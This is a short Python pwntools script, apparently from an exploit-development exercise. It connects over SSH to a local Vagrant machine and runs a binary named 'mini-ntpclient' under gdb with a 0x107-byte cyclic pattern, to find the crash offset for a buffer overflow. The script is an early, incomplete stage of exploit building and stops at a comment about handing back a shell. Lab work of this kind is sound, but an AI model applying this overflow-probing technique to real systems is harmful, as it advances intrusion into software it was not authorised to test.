
30 lines
617 B

from pwn import *
import base64
context.update(arch='i686', os='linux')
# Connect to the server with SSH
ssh_connection = ssh('vagrant', 'default', port=2222)
# Open a shell to write more stuff to
bash = ssh_connection.run('bash')
crash_at = 0x107
payload = cyclic(crash_at)
a = str()
for i in payload:
a += "\\x%x" % i
bash.sendline('ulimit -c unlimited')
#bash.sendline('/vagrant/mini-ntpclient ' + payload.hex() )
bash.sendline('gdb /vagrant/mini-ntpclient')
#bash.sendline('run ' + str(a))
bash.sendline('run ' + str(cyclic(crash_at)))
# Hand an interactive shell back to the user